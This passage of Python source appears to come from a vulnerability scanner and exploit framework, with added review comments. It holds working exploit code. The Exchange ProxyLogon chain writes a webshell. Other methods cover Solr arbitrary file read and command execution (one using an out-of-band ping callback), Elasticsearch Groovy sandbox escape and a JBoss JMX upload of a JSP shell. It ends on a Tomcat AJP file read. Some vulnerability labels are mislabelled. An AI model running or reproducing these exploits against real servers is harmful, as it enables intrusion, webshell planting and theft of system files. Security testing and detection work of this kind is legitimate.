            ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
            headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
            r = requests.get(url,
                             headers=headers,
                             timeout=self.timeout,
                             verify=False)
            # NOTE(review): control flow via assert -- a no-op under -O; raise
            # explicitly instead. (The PoC variant has this line commented out.)
            assert r.status_code == 401, "Error while getting ComputerName"
            auth_header = r.headers['WWW-Authenticate']
            auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
                             auth_header).group(1)
            domain_name, computer_name = _parse_challenge(b64decode(auth))
            print('[*] Domain Name   =', domain_name)
            print('[*] Computer Name =', computer_name)
            NAME = computer_name
            # get SID
            sid = _get_sid(self.url, NAME, MAIL)
            print('[*] Login sid =', sid)
            payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
                MAIL.split('@')[0], sid)
            r = __exploit(self.url,
                          NAME,
                          '/ecp/proxyLogon.ecp',
                          qs='',
                          data=payload)
            session_id = r.cookies.get('ASP.NET_SessionId')
            canary = r.cookies.get('msExchEcpCanary')
            print('[*] get ASP.NET_SessionId =', session_id)
            print('[*] get msExchEcpCanary   =', canary)
            # NOTE(review): this try only guards the TypeError from
            # concatenating None; the fallback sends the literal "None".
            try:
                extra_cookies = [
                    'ASP.NET_SessionId=' + session_id,
                    'msExchEcpCanary=' + canary
                ]
            except:
                extra_cookies = [
                    'ASP.NET_SessionId=' + str(session_id),
                    'msExchEcpCanary=' + str(canary)
                ]
            # Getting OAB information
            qs = urlencode({
                'schema': 'OABVirtualDirectory',
                'msExchEcpCanary': canary
            })
            r = __exploit(self.url,
                          NAME,
                          '/ecp/DDI/DDIService.svc/GetObject',
                          qs=qs,
                          data='',
                          cookies=extra_cookies)
            try:
                identity = r.json()['d']['Output'][0]['Identity']
                print('[*] OAB Name', identity['DisplayName'])
                print('[*] OAB ID  ', identity['RawIdentity'])
            except:
                # NOTE(review): ``identity`` is then subscripted below without
                # a check, so the failure becomes a TypeError.
                identity = False
            print('[*] Setting up webshell payload through OAB')
            qs = urlencode({
                'schema': 'OABVirtualDirectory',
                'msExchEcpCanary': canary
            })
            payload = json.dumps({
                'identity': {
                    '__type': 'Identity:ECP',
                    'DisplayName': identity['DisplayName'],
                    'RawIdentity': identity['RawIdentity']
                },
                'properties': {
                    'Parameters': {
                        '__type':
                        'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                        'ExternalUrl': 'http://f/' + FILE_DATA
                    }
                }
            })
            r = __exploit(self.url,
                          NAME,
                          '/ecp/DDI/DDIService.svc/SetObject',
                          qs=qs,
                          data=payload,
                          cookies=extra_cookies)
            if r.status_code == 200:
                print('[*] Writing shell')
                qs = urlencode({
                    'schema': 'ResetOABVirtualDirectory',
                    'msExchEcpCanary': canary
                })
                payload = json.dumps({
                    'identity': {
                        '__type': 'Identity:ECP',
                        'DisplayName': identity['DisplayName'],
                        'RawIdentity': identity['RawIdentity']
                    },
                    'properties': {
                        'Parameters': {
                            '__type':
                            'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                            'FilePathName': FILE_PATH
                        }
                    }
                })
                r = __exploit(self.url,
                              NAME,
                              '/ecp/DDI/DDIService.svc/SetObject',
                              qs=qs,
                              data=payload,
                              cookies=extra_cookies)

                # Set-OABVirtualDirectory
                print('[*] Cleaning OAB')
                qs = urlencode({
                    'schema': 'OABVirtualDirectory',
                    'msExchEcpCanary': canary
                })
                payload = json.dumps({
                    'identity': {
                        '__type': 'Identity:ECP',
                        'DisplayName': identity['DisplayName'],
                        'RawIdentity': identity['RawIdentity']
                    },
                    'properties': {
                        'Parameters': {
                            '__type':
                            'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                            'ExternalUrl': ''
                        }
                    }
                })
                r = __exploit(self.url,
                              NAME,
                              '/ecp/DDI/DDIService.svc/SetObject',
                              qs=qs,
                              data=payload,
                              cookies=extra_cookies)
            # NOTE(review): reached on both branches of the ``if`` above, so
            # success is reported even when the first SetObject was not 200;
            # ``r`` here is whichever response came last.
            up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file
            self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore')
            verify.exploit_print(up, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
 def cve_2021_26855_poc(self) -> None:
     """SSRF check for CVE-2021-26855 on an Exchange target.

     First request: the backend cookies point at a callback host obtained
     from ``dns_request()``; a hit reported by ``dns_result(dns)`` is
     ``PoCSuCCeSS`` (``dns_request``/``dns_result`` are defined elsewhere
     in this file and presumably implement an out-of-band DNS token --
     confirm there). Fallback: the same cookies with ``localhost`` and a
     500-response fingerprint, recorded as ``PoC_MaYbE``. Findings go to
     ``self.vul_info`` and ``verify.scan_print``; nothing is returned.

     NOTE(review): ``vul_desc`` below is the CVE-2021-27065 file-write
     text, not a description of this SSRF entry; ``vul_name``/``vul_type``
     are the accurate fields.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-26855"
     self.vul_info["vul_apps"] = "Exchange"
     self.vul_info["vul_date"] = "2021-03-03"
     self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
     self.vul_info["cre_date"] = "2021-03-07"
     self.vul_info["cre_auth"] = "zhzyker"
     url = self.url + "/owa/auth/x.js"
     dns = dns_request()
     cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
     # Both "localhost" occurrences are replaced with the callback host.
     cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace(
         "localhost", dns)
     try:
         headers = {
             "User-agent": self.ua,
             "Cookie": cookie_dns,
             "Connection": "close"
         }
         res = requests.get(url,
                            headers=headers,
                            timeout=self.timeout,
                            verify=False)
         # The response itself is not inspected here; only the callback
         # result decides.
         if dns_result(dns):
             self.vul_info["vul_data"] = dump.dump_all(res).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = headers["Cookie"]
             self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
                 "Cookie"] + "]"
         else:
             headers = {
                 "User-agent": self.ua,
                 "Cookie": cookie_local,
                 "Connection": "close"
             }
             res = requests.get(url,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
             # Error-page fingerprint; weaker evidence, hence PoC_MaYbE.
             if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
                 if r"TargetUnknown" in res.text and r"localhost" in res.text:
                     self.vul_info["vul_data"] = dump.dump_all(res).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info["vul_payd"] = headers["Cookie"]
                     self.vul_info[
                         "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
                             "Cookie"] + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         # NOTE(review): ``error`` is unused; the failure cause is lost.
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def time_2021_0318_poc(self) -> None:
     """Probe an Apache Solr instance for the 2021-03-18 arbitrary file read.

     Sequence as written: list cores via ``/solr/admin/cores``, POST a
     ``set-property`` config change to the first core that turns on
     ``requestDispatcher.requestParsers.enableRemoteStreaming``, then ask
     ``/debug/dump?param=ContentStreams`` to stream a ``file://`` URL and
     look for ``/etc/passwd`` (Linux) or ``win.ini`` (Windows) fingerprints
     in the body. Findings go into ``self.vul_info`` and out through
     ``verify.scan_print``; ``self.threadLock`` is held for the whole run.

     Side effect on the target: the remote-streaming property is switched
     on and nothing in this method reverts it, so a probed core stays
     reconfigured. For detection, the distinguishing requests are a POST
     to ``/solr/<core>/config`` carrying ``set-property`` followed by a
     multipart POST to ``/solr/<core>/debug/dump`` with ``stream.url``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: time-2021-03-18"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = ""
     self.vul_info["vul_name"] = "Apache Solr Arbitrary file reading"
     self.vul_info["vul_numb"] = "time-2021-03-18"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2021-03-17"
     self.vul_info["vul_vers"] = "all"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Arbitrary file read"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Arbitrary file read"
     self.vul_info["cre_auth"] = "zhzyker"
     # First core name reported by the admin endpoint; stays None when the
     # listing cannot be parsed (see the bare except below).
     core_name = None
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             # NOTE(review): bare except swallows everything (JSON errors,
             # KeyError, IndexError); the probe then continues with
             # core_name None and targets "/solr/None/config".
             pass
         set_property = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {
             'Content-Type': 'application/json',
             # NOTE(review): header value is misspelled ("colse"); left
             # untouched here because it is sent on the wire as-is.
             'Connection': 'colse',
             'User-Agent': self.ua
         }
         # Persistent config change on the target core; not reverted.
         data = r'''{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'''
         r = requests.post(set_property,
                           data=data,
                           headers=headers_json,
                           timeout=self.timeout,
                           verify=False)
         # A 200 with a Solr "responseHeader" is taken as "config accepted".
         if r.status_code == 200 and r"responseHeader" in r.text:
             rce_url = self.url + "/solr/" + str(
                 core_name) + "/debug/dump?param=ContentStreams"
             headers = {
                 'User-Agent':
                 self.ua,
                 'Connection':
                 'colse',
                 'Content-Type':
                 'multipart/form-data; boundary=------------------------e602c3e1a193d599'
             }
             # Hand-built multipart body; the only field is stream.url.
             data = '--------------------------e602c3e1a193d599\r\n'
             data += 'Content-Disposition: form-data; name="stream.url"\r\n'
             data += '\r\n'
             data += 'file:///etc/passwd\r\n'
             data += '--------------------------e602c3e1a193d599--\r\n'
             req = requests.post(rce_url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
             # Linux fingerprint: three passwd-file markers plus "daemon:".
             if r"root:x:0:0:root" in req.text and r"/root:/bin/bash" in req.text and r"/usr/sbin/nologin" in req.text:
                 if r"daemon:" in req.text and req.status_code == 200:
                     self.vul_info["vul_data"] = dump.dump_all(req).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoCSuCCeSS"
                     self.vul_info[
                         "prt_info"] = "[file read] [os:linux] [corename: " + self.url + "/solr/" + core_name + " ]"
             else:
                 # Windows attempt is only made when the Linux markers
                 # are absent; same endpoint, different stream.url.
                 data = '--------------------------e602c3e1a193d599\r\n'
                 data += 'Content-Disposition: form-data; name="stream.url"\r\n'
                 data += '\r\n'
                 data += 'file:///C:windows/win.ini\r\n'
                 data += '--------------------------e602c3e1a193d599--\r\n'
                 req = requests.post(rce_url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
                 if r"app support" in req.text and r"fonts" in req.text and r"mci extensions" in req.text:
                     if r"files" in req.text and req.status_code == 200:
                         self.vul_info["vul_data"] = dump.dump_all(
                             req).decode('utf-8', 'ignore')
                         self.vul_info["prt_resu"] = "PoCSuCCeSS"
                         self.vul_info[
                             "prt_info"] = "[file read] [os:windows] [corename: " + self.url + "/solr/" + core_name + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     # Every exception path above is caught, so the lock is always released.
     self.threadLock.release()
 def cve_2019_0193_poc(self) -> None:
     """Probe Apache Solr for CVE-2019-0193 (DataImportHandler).

     Sequence as written: list cores, GET ``/admin/mbeans`` on the first
     core (the response is discarded), then POST
     ``self.payload_cve_2019_0193`` to ``/solr/<core>/dataimport``.
     The verdict is "PoC_MaYbE" whenever the last POST returns 200 and a
     core name was obtained; the ``echo <md>`` marker placed in the
     payload is never looked for in any response, so a 200 alone is the
     evidence. Results are reported through ``verify.scan_print`` and
     ``self.threadLock`` is held throughout.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-0193"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2019-10-16"
     self.vul_info["vul_vers"] = "< 8.2.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                 "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
     self.vul_info["cre_auth"] = "zhzyker"
     # NOTE(review): the string "null" is the "no core found" sentinel
     # here, whereas sibling probes use None; the check at the end
     # compares against "null" only.
     core_name = "null"
     md = random_md5()
     cmd = "echo " + md
     # The marker command is URL-quoted into the payload but never
     # checked against a response below.
     payload = self.payload_cve_2019_0193.replace("RECOMMAND",
                                                  quote(cmd, 'utf-8'))
     solrhost = self.hostname + ":" + str(self.port)
     headers = {
         'Host': "" + solrhost,
         'User-Agent': self.ua,
         'Accept': "application/json, text/plain, */*",
         'Accept-Language':
         "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
         'Accept-Encoding': "zip, deflate",
         'Referer': self.url + "/solr/",
         'Content-type': "application/x-www-form-urlencoded",
         'X-Requested-With': "XMLHttpRequest",
         'Connection': "close"
     }
     urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(urlcore,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             # NOTE(review): bare except; any parse failure leaves the
             # "null" sentinel in place and the probe carries on.
             pass
         urlconfig = self.url + "/solr/" + str(
             core_name) + "/admin/mbeans?cat=QUERY&wt=json"
         # NOTE(review): this response is overwritten two statements
         # later and never inspected.
         request = requests.get(urlconfig,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
         url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
         request = requests.post(url_cmd,
                                 data=payload,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         # Weak evidence: HTTP 200 plus a known core name, no output check.
         if request.status_code == 200 and core_name != "null":
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             self.vul_info[
                 "prt_info"] = "[maybe] [core name:" + url_cmd + "] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
<![CDATA[]]> def cve_2015_1427_poc(self) -> None:
     """Probe Elasticsearch for CVE-2015-1427 (Groovy sandbox bypass).

     Sequence as written: POST a small JSON document to
     ``/website/blog/`` (so the index has at least one hit), then POST
     ``self.data_rce`` to ``/_search?pretty`` and read
     ``hits.hits[0].fields.lupin[0]`` from the JSON reply. The probe is
     marked "PoCSuCCeSS" only when the random ``md`` marker echoed by the
     script appears in that field. Reported via ``verify.scan_print``;
     ``self.threadLock`` is held throughout.

     Side effect on the target: the document written to ``website/blog``
     is not deleted by this method. Note the request state is kept on
     ``self`` (``self.request``, ``self.req``, ``self.r``,
     ``self.headers_text``, ``self.host``) rather than in locals.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Elasticsearch: CVE-2015-1427"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2015_1427.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2015-1427"
     # NOTE(review): "Fastjson" disagrees with the Elasticsearch name and
     # CVE above; looks like a copy-paste slip in the report metadata.
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2015-01-31"
     self.vul_info["vul_vers"] = "< 1.3.7, < 1.4.3"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Elasticsearch 1.3.8之前的Groovy脚本引擎和1.4.3之前的1.4.x中的Groovy脚本引擎允许远程攻击" \
                                 "者绕过沙盒保护机制,并通过精心制作的脚本执行任意shell命令。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     # Seed document; a search needs at least one hit to carry the field.
     self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
     md = random_md5()
     cmd = "echo " + md
     self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
     self.host = self.hostname + ":" + str(self.port)
     self.headers_text = {
         'Host': "" + self.host,
         'Accept': '*/*',
         'Connection': 'close',
         'Accept-Language': 'en',
         'User-Agent': self.ua,
         'Content-Type': 'application/text'
     }
     try:
         # Uses the instance-level self.headers, not headers_text.
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers_text,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
         except:
             # NOTE(review): bare except; any missing key or non-JSON body
             # collapses to the "null" sentinel, which never contains md.
             self.r = "null"
         if md in self.r:
             self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2017_12629_poc(self) -> None:
     """Probe Apache Solr for CVE-2017-12629 (RunExecutableListener).

     Sequence as written: list cores, POST ``payload1`` (a config change
     carrying a ``ping <md>.<ceye_domain>`` command and a fresh core name)
     to ``/solr/<core>/config``, then — when a ceye domain is configured —
     POST ``payload2`` to ``/solr/<core>/update`` to trigger the listener
     and poll the ceye API for the ``md`` marker. Without a ceye domain
     the verdict falls back to "PoC_MaYbE". Reported via
     ``verify.scan_print``; ``self.threadLock`` is held throughout.

     Side effects: the process-wide HTTP version override on the first
     line is never restored, and the config change POSTed to the target
     is not reverted by this method. The detectable signals are the POST
     to ``/solr/<core>/config`` and an outbound DNS/ICMP lookup of
     ``<md>.<ceye_domain>`` from the Solr host.
     """
     self.threadLock.acquire()
     # NOTE(review): process-wide monkeypatch of http.client, not scoped
     # to this probe and not restored; other threads and later probes
     # (cve_2010_0738_poc sets 'HTTP/1.1') race on it.
     http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
     self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-12629"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2017-10-14"
     self.vul_info["vul_vers"] = "< 7.1.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
                                 "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
     self.vul_info["cre_auth"] = "zhzyker"
     # "null" string sentinel for "no core listed" (sibling probes use None).
     core_name = "null"
     new_core = random_md5()
     md = random_md5()
     # Out-of-band marker: the target is asked to resolve <md>.<ceye_domain>.
     cmd = "ping " + md + "." + self.ceye_domain
     payload1 = self.payload_cve_2017_12629.replace(
         "RECOMMAND", cmd).replace("new_core", new_core)
     payload2 = '[{"id": "test"}]'
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     headers_solr1 = {
         'Accept': "*/*",
         'User-Agent': self.ua,
         'Content-Type': "application/json"
     }
     headers_solr2 = {
         'Host': "localhost",
         'Accept-Language': "en",
         'User-Agent': self.ua,
         'Connection': "close",
         'Content-Type': "application/json"
     }
     try:
         request = requests.get(url_core,
                                headers=headers_solr1,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             # NOTE(review): bare except; parse failures are silent.
             pass
         req = requests.post(self.url + "/solr/" + str(core_name) +
                             "/config",
                             data=payload1,
                             headers=headers_solr1,
                             timeout=self.timeout,
                             verify=False)
         # Sentinel check: "xxxxxx" in ceye_domain presumably means no
         # ceye account is configured — TODO confirm against the config loader.
         if r"xxxxxx" in self.ceye_domain:
             # NOTE(review): this checks `request` (the core-list GET),
             # not `req` (the config POST), so "PoC_MaYbE" is keyed on the
             # listing succeeding rather than the config change.
             if request.status_code == 200 and core_name != "null" and core_name is not None:
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info[
                     "prt_info"] = "[maybe] [new core:" + new_core + "] "
                 verify.scan_print(self.vul_info)
         else:
             request = requests.post(self.url + "/solr/" + str(core_name) +
                                     "/update",
                                     data=payload2,
                                     headers=headers_solr2,
                                     timeout=self.timeout,
                                     verify=False)
             # NOTE(review): no timeout= and no verify= on this call; a
             # stalled ceye API blocks here with threadLock still held.
             request = requests.get(self.ceye_api + self.ceye_token)
             if md in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info[
                     "prt_info"] = "[ceye] [new core:" + new_core + "] "
                 verify.scan_print(self.vul_info)
             else:
                 verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2010_0738_poc(self) -> None:
     """Probe JBoss for CVE-2010-0738 (JMX console verb-tampering bypass).

     Sequence as written: send a HEAD request to
     ``/jmx-console/HtmlAdaptor`` whose query string invokes
     ``DeploymentFileRepository.store`` with ``shells.war`` /
     ``shells.jsp`` and a random ``md`` body, GET
     ``/shells/shells.jsp``, repeat both once with a 0.5 s pause, and mark
     "PoCSuCCeSS" when the final GET is 200 and ``md`` survives
     ``misinformation()``. Reported via ``verify.scan_print``;
     ``self.threadLock`` is held throughout.

     Side effects: a ``shells.war`` containing ``shells.jsp`` is deployed
     on the target and never removed by this method, and the process-wide
     HTTP version override is not restored. For detection, the telling
     request is a HEAD to ``/jmx-console/HtmlAdaptor`` with
     ``action=invokeOpByName`` and ``service=DeploymentFileRepository``.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-0738"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "JBoss JMX控制台安全验证绕过漏洞"
     self.vul_info["vul_numb"] = "CVE-2010-0738"
     self.vul_info["vul_apps"] = "JBoss"
     self.vul_info["vul_date"] = "2014-03-21"
     self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "任意文件上传"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "CVE-2010-0738漏洞利用了HTTP中HEAD请求方法,绕过了对GET和POST请求的限制," \
                                 "成功地再次利用jboss.admin -> DeploymentFileRepository -> store()方法上传文件。"
     self.vul_info["cre_date"] = "2021-01-28"
     self.vul_info["cre_auth"] = "zhzyker"
     # NOTE(review): process-wide http.client override, never restored;
     # cve_2017_12629_poc sets the same global to 'HTTP/1.0'.
     http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
     self.path = "/jmx-console/HtmlAdaptor"
     md = random_md5()
     # The random marker is what gets written into shells.jsp.
     self.data = md
     self.poc = (
         "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
         "store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java"
         ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" +
         self.data + "&argType=boolean&arg4=True")
     # NOTE(review): self.exp is assembled here (reading self.name and
     # self.jsp_webshell) but is not used anywhere in this method.
     self.exp = (
         "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
         "store&argType=java.lang.String&arg0=" + self.name +
         ".war&argType=java.lang.String&arg1=" + self.name + "&argType=java"
         ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" +
         self.jsp_webshell + "&argType=boolean&arg4=True")
     # Overwrites the instance-level self.headers used by sibling probes.
     self.headers = {
         "Accept":
         "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
         'User-Agent': self.ua,
         "Connection": "keep-alive"
     }
     try:
         self.req = requests.head(self.url + self.path + self.poc,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         self.request = requests.get(self.url + "/shells/shells.jsp",
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         # Second round after a short pause — presumably to give the
         # deployment scanner time to pick the archive up; TODO confirm.
         self.req = requests.head(self.url + self.path + self.poc,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         time.sleep(0.5)
         self.request = requests.get(self.url + "/shells/shells.jsp",
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         # misinformation() is defined elsewhere in the project; only the
         # second GET is evaluated.
         if md in misinformation(self.request.text,
                                 md) and self.request.status_code == 200:
             self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = self.poc
             self.vul_info[
                 "prt_info"] = "[jmx-console] [upload: " + self.url + "/shells/shells.jsp ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2020_1938_exp(self, file):
     """Read a file over AJP (Tomcat CVE-2020-1938) and print the body.

     Opens a raw TCP socket to ``self.hostname:self.port``, builds an AJP
     forward request for ``/`` with ``javax.servlet.include.*``
     attributes pointing ``path_info`` at ``file``, sends it through
     ``send_and_receive`` and joins the data frames into
     ``self.request``, which ``verify.exploit_print`` then emits.

     Known rough edges visible here: the ``vul_name`` label says Shiro
     CVE-2016-4437 and ``raw_data`` says "cve-2020-2019", neither of
     which matches the method name; the socket is never closed on any
     path; ``socket.setdefaulttimeout`` is process-wide; and the empty
     response path returns a tuple while every other path returns None.
     """
     # NOTE(review): mislabelled — this is the Tomcat AJP probe, not Shiro.
     vul_name = "Apache Shiro: CVE-2016-4437"
     headers = self.headers
     # The block below overwrites several instance attributes (including
     # self.hostname) as a side effect of running this probe.
     self.output_method = "ajp"
     self.default_port = self.port
     self.default_requri = '/'
     self.default_headers = {}
